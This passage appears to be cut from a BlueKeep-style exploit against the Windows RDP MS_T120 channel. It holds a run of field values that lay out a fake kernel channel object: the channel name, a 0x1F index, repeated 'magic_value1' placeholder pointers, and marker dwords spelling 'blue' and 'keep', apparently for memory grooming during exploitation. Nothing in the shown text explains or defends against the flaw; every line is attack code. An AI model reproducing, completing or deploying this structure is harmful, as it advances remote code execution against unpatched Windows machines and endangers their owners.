0x5, # channelClass (DWORD, 4 bytes)  
"MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes)  
0x1F, # channelIndex (DWORD, 4 bytes)  
magic_value1, # channels (QWORD, 8 bytes)  
magic_value1, # connChannelsAddr (POINTER, 8 bytes)  
magic_value1, # list1 (QWORD, 8 bytes)  
magic_value1, # list1 (QWORD, 8 bytes)  
magic_value1, # list2 (QWORD, 8 bytes)  
magic_value1, # list2 (QWORD, 8 bytes)  
0x65756c62, # inputBufferLen (DWORD, 4 bytes)  
0x7065656b, # inputBufferLen (DWORD, 4 bytes)  
magic_value1, # connResrouce (QWORD, 8 bytes)  
0x65756c62, # lockCount158 (DWORD, 4 bytes)  
0x7065656b, # dword15C (DWORD, 4 bytes)